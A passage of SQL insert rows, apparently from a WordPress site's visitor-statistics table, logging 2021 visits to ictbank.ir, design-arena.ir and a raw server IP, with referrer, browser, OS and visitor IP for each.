(13251,'2021-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.170.90','000',0,2,0),
(13252,'2021-08-30','http://ictbank.ir/blog/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','Opera','Windows','10.0',NULL,NULL,'','173.245.202.73','000',0,2,0),
(13253,'2021-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(13254,'2021-08-30','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','5.89.185.128','000',0,1,0),
(13255,'2021-08-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(13256,'2021-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.39.223','000',0,1,0),
(13257,'2021-08-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(13258,'2021-08-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13259,'2021-08-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(13260,'2021-08-30','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','143.198.71.184','000',0,3,0),
(13261,'2021-08-30','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','196.191.248.242','000',0,2,0),
(13262,'2021-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(13263,'2021-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13264,'2021-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13265,'2021-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13266,'2021-08-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','209.58.130.41','000',0,5,0),
(13267,'2021-08-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(13268,'2021-08-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','163.172.123.92','000',0,5,0),
(13269,'2021-08-30','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','180.249.116.156','000',0,2,0),
(13270,'2021-08-31','http://82.102.9.14:80/','Safari','iOS','12.3.1',NULL,NULL,'','51.195.103.74','000',0,2,0),
(13271,'2021-08-31','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','192.42.116.13','000',0,2,0),
(13272,'2021-08-31','http://82.102.9.14:80/','Chrome','Windows','6.1',NULL,NULL,'','158.69.35.227','000',0,2,0),
(13273,'2021-08-31','http://82.102.9.14:80/','Chrome','Windows','6.1',NULL,NULL,'','185.220.103.9','000',0,2,0),
(13274,'2021-08-31','http://82.102.9.14:80/','Internet Explorer','Windows','5.1',NULL,NULL,'','45.61.185.53','000',0,2,0),
(13275,'2021-08-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.134.180.188','000',0,1,0),
(13276,'2021-08-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','46.8.15.124','000',0,1,0),
(13277,'2021-08-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(13278,'2021-08-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(13279,'2021-08-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13280,'2021-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.177.110','000',0,2,0),
(13281,'2021-08-31','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','131.255.29.159','000',0,2,0),
(13282,'2021-08-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.85.192.135','000',0,2,0),
(13283,'2021-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.223.63','000',0,1,0),
(13284,'2021-08-31','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.143.241.177','000',0,4,0),
(13285,'2021-08-31','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','200.201.3.234','000',0,2,0),
(13286,'2021-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(13287,'2021-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.197.14','000',0,1,0),
(13288,'2021-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13289,'2021-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13290,'2021-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.198.26.248','000',0,2,0),
(13291,'2021-08-31','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(13292,'2021-09-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(13293,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(13294,'2021-09-01','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','36.75.147.11','000',0,2,0),
(13295,'2021-09-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13296,'2021-09-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(13297,'2021-09-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','40.86.214.136','000',0,2,0),
(13298,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.10','000',0,6,0),
(13299,'2021-09-01','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(13300,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.175.178.172','000',0,2,0),
(13301,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.65.226','000',0,2,0),
(13302,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.249.133.142','000',0,1,0),
(13303,'2021-09-01','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','106.51.2.101','000',0,2,0),
(13304,'2021-09-01','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.242.115.131','000',0,13,0),
(13305,'2021-09-01','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.242.21.87','000',0,2,0),
(13306,'2021-09-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,9,0),
(13307,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.249.244.126','000',0,1,0),
(13308,'2021-09-01','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.144.7','000',0,1,0),
(13309,'2021-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.168.254','000',0,1,0),
(13310,'2021-09-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.186.142.31','000',0,2,0),
(13311,'2021-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13312,'2021-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(13313,'2021-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(13314,'2021-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13315,'2021-09-01','http://www.ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','61.135.15.143','000',0,2,0),
(13316,'2021-09-01','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(13317,'2021-09-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(13318,'2021-09-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13319,'2021-09-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','45.179.140.164','000',0,2,0),
(13320,'2021-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.142.174.195','000',0,1,0),
(13321,'2021-09-02','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,2,0),
(13322,'2021-09-02','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.23.211','000',0,1,0),
(13323,'2021-09-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','27.254.102.26','000',0,1,0),
(13324,'2021-09-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','173.201.183.183','000',0,1,0),
(13325,'2021-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.68.58.181','000',0,2,0),
(13326,'2021-09-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,2,0),
(13327,'2021-09-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.233.181','000',0,2,0),
(13328,'2021-09-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,3,0),
(13329,'2021-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.38.53','000',0,1,0),
(13330,'2021-09-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.149.132.238','000',0,2,0),
(13331,'2021-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.188.156','000',0,1,0),
(13332,'2021-09-02','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(13333,'2021-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(13334,'2021-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(13335,'2021-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13336,'2021-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13337,'2021-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.196.164','000',0,2,0),
(13338,'2021-09-02','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','2.57.122.9','000',0,8,0),
(13339,'2021-09-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,10,0),
(13340,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,2,0),
(13341,'2021-09-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13342,'2021-09-03','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.143','000',0,1,0),
(13343,'2021-09-03','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.151','000',0,1,0),
(13344,'2021-09-03','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13345,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.38.35','000',0,2,0),
(13346,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(13347,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,48,0),
(13348,'2021-09-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','13.82.174.71','000',0,2,0),
(13349,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.65.156.217','000',0,2,0),
(13350,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.123.175','000',0,1,0),
(13351,'2021-09-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13352,'2021-09-03','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.145.96','000',0,2,0),
(13353,'2021-09-03','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','42.193.16.135','000',0,4,0),
(13354,'2021-09-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13355,'2021-09-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(13356,'2021-09-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,2,0),
(13357,'2021-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.232.46.220','000',0,2,0),
(13358,'2021-09-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(13359,'2021-09-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13360,'2021-09-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13361,'2021-09-04','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(13362,'2021-09-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,20,0),
(13363,'2021-09-04','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(13364,'2021-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.6.2','000',0,2,0),
(13365,'2021-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.128.20.124','000',0,2,0),
(13366,'2021-09-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13367,'2021-09-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13368,'2021-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.174.57','000',0,1,0),
(13369,'2021-09-04','http://mail.design-arena.ir/blog','Chrome','Android','10.0',NULL,NULL,'','124.126.78.142','000',0,5,0),
(13370,'2021-09-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.35','000',0,35,0),
(13371,'2021-09-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(13372,'2021-09-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(13373,'2021-09-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(13374,'2021-09-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13375,'2021-09-04','http://ictbank.ir/blog','Chrome','OS X','10.8.2',NULL,NULL,'','195.78.54.222','000',0,2,0),
(13376,'2021-09-04','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.154.71.121','000',0,1,0),
(13377,'2021-09-05','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','18.202.253.49','000',0,1,0),
(13378,'2021-09-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13379,'2021-09-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13380,'2021-09-05','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.4.181.178','000',0,2,0),
(13381,'2021-09-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13382,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.77.226','000',0,2,0),
(13383,'2021-09-05','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','62.171.149.181','000',0,2,0),
(13384,'2021-09-05','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','193.243.164.163','000',0,3,0),
(13385,'2021-09-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(13386,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.76.116','000',0,2,0),
(13387,'2021-09-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','46.235.100.107','000',0,2,0),
(13388,'2021-09-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13389,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13390,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.79.244','000',0,1,0),
(13391,'2021-09-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13392,'2021-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(13393,'2021-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(13394,'2021-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(13395,'2021-09-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13396,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.125.206.140','000',0,3,0),
(13397,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(13398,'2021-09-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.191.71.63','000',0,1,0),
(13399,'2021-09-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13400,'2021-09-05','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.89.196.182','000',0,6,0),
(13401,'2021-09-06','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','138.199.16.146','000',0,1,0),
(13402,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.193.231.92','000',0,2,0),
(13403,'2021-09-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13404,'2021-09-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','219.95.82.17','000',0,1,0),
(13405,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.125.206.140','000',0,2,0),
(13406,'2021-09-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(13407,'2021-09-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','82.202.165.100','000',0,1,0),
(13408,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.58.149','000',0,2,0),
(13409,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.11.131','000',0,2,0),
(13410,'2021-09-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(13411,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.15.111.122','000',0,1,0),
(13412,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.28.188.218','000',0,1,0),
(13413,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','62.214.62.134','000',0,1,0),
(13414,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.247.148','000',0,1,0),
(13415,'2021-09-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.68.26','000',0,2,0),
(13416,'2021-09-06','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(13417,'2021-09-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.247','000',0,2,0),
(13418,'2021-09-06','http://82.102.9.14:80/blog','Firefox','Linux','Unknown',NULL,NULL,'','179.43.169.179','000',0,2,0),
(13419,'2021-09-06','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','82.156.185.91','000',0,2,0),
(13420,'2021-09-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','102.182.252.12','000',0,1,0),
(13421,'2021-09-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.183.228.139','000',0,1,0),
(13422,'2021-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(13423,'2021-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13424,'2021-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13425,'2021-09-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13426,'2021-09-06','http://design-arena.ir/blog','SeaMonkey','Windows','6.1',NULL,NULL,'','154.79.252.146','000',0,2,0),
(13427,'2021-09-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13428,'2021-09-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.90','000',0,2,0),
(13429,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(13430,'2021-09-07','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.127.252','000',0,2,0),
(13431,'2021-09-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(13432,'2021-09-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13433,'2021-09-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','27.254.102.26','000',0,2,0),
(13434,'2021-09-07','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','159.69.58.136','000',0,9,0),
(13435,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.143.251','000',0,2,0),
(13436,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.95.108.186','000',0,2,0),
(13437,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13438,'2021-09-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.144.176.138','000',0,2,0),
(13439,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.91.201','000',0,1,0),
(13440,'2021-09-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(13441,'2021-09-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13442,'2021-09-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.242.234.127','000',0,5,0),
(13443,'2021-09-07','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.77.102','000',0,2,0),
(13444,'2021-09-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,2,0),
(13445,'2021-09-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13446,'2021-09-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13447,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(13448,'2021-09-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13449,'2021-09-07','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.242.157.242','000',0,2,0),
(13450,'2021-09-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(13451,'2021-09-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(13452,'2021-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.45.77.102','000',0,1,0),
(13453,'2021-09-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(13454,'2021-09-08','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,2,0),
(13455,'2021-09-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13456,'2021-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.105.140','000',0,2,0),
(13457,'2021-09-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.4.79','000',0,1,0),
(13458,'2021-09-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','63.33.48.83','000',0,2,0),
(13459,'2021-09-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,1,0),
(13460,'2021-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.100.254','000',0,1,0),
(13461,'2021-09-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.0.74.183','000',0,1,0),
(13462,'2021-09-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(13463,'2021-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(13464,'2021-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(13465,'2021-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13466,'2021-09-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13467,'2021-09-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(13468,'2021-09-08','http://ictbank.ir/','Opera','Windows','6.1',NULL,NULL,'','103.144.161.20','000',0,1,0),
(13469,'2021-09-08','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Opera','Windows','6.1',NULL,NULL,'','103.144.161.23','000',0,2,0),
(13470,'2021-09-08','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,2,0),
(13471,'2021-09-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','103.253.25.169','000',0,1,0),
(13472,'2021-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.81.12.83','000',0,4,0),
(13473,'2021-09-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.1','000',0,1,0),
(13474,'2021-09-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13475,'2021-09-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(13476,'2021-09-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
